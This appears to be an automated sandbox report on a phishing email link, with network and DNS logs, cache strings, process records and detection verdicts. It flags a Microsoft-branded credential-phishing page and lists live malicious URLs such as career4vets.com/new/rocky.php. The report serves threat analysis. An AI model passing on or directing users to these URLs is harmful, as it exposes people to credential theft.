        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8b62cdd32d9718b1/1724161320639/3888b8147d1e4e8d5dfb484f0c0e0a762cb1be53c184273959697968fd2372dd/mhw0YNMa9duS1Qm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: bestcomps.com.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: riseandgain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: us-west-2.protection.sophos.com
        Source: global trafficDNS traffic detected: DNS query: e9dj7.r.ag.d.sendibm3.com
        Source: global trafficDNS traffic detected: DNS query: sibautomation.com
        Source: global trafficDNS traffic detected: DNS query: in-automate.brevo.com
        Source: global trafficDNS traffic detected: DNS query: willpeltz.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: career4vets.com
        Source: global trafficDNS traffic detected: DNS query: riseandgain.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: bestcomps.com.ru
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 13:40:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 13:42:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 13:42:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: hZl+dhMPO7ofsNVEKQc/MsRgoCB8IJjbivE=$PDA8SgANGxy5CPwTcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8b62cde3aecb42e8-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 13:42:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5TSxlAteZe6DBDGCBpN6A6n9P1igGXzBN2o=$21FnnrKvI8CCzNbFServer: cloudflareCF-RAY: 8b62cdf5bec8438b-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 13:42:08 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: AJ2daGsCWtxuzU6Nk0RMr3iusciyiRl6230=$s40hX0EcobrG0w4rServer: cloudflareCF-RAY: 8b62ce120e8942b9-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 13:42:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#about
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#classic-cars
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#contact
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#electric-vehicles
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#faq
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#learn-more
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#modern-supercars
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#privacy
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#services
        Source: chromecache_75.1.drString found in binary or memory: https://bestcomps.com.ru/#terms
        Source: chromecache_88.1.drString found in binary or memory: https://career4vets.com/new/rocky.php
        Source: chromecache_75.1.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
        Source: chromecache_75.1.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
        Source: chromecache_74.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
        Source: chromecache_74.1.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
        Source: chromecache_75.1.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
        Source: chromecache_85.1.drString found in binary or memory: https://in-automate.brevo.com/cm?
        Source: chromecache_86.1.drString found in binary or memory: https://sibautomation.com/cm.html?id=8031197#trans=0&amp;user_id=1
        Source: chromecache_75.1.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
        Source: chromecache_86.1.drString found in binary or memory: https://willpeltz.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.16:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49734 version: TLS 1.2
        Source: classification engineClassification label: mal100.phis.win@21/36@34/19
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1968,i,4422493508800080892,16665077100818751429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1968,i,4422493508800080892,16665077100818751429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: https://willpeltz.com/LLM: Page with brand: microsoft contains button: verify to play voice message DOM: 2.1.pages.csv
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Registry Run Keys / Startup Folder
        Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg0%Avira URL Cloudsafe
        https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg100%SlashNextCredential Stealing type: Phishing & Social Engineering
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
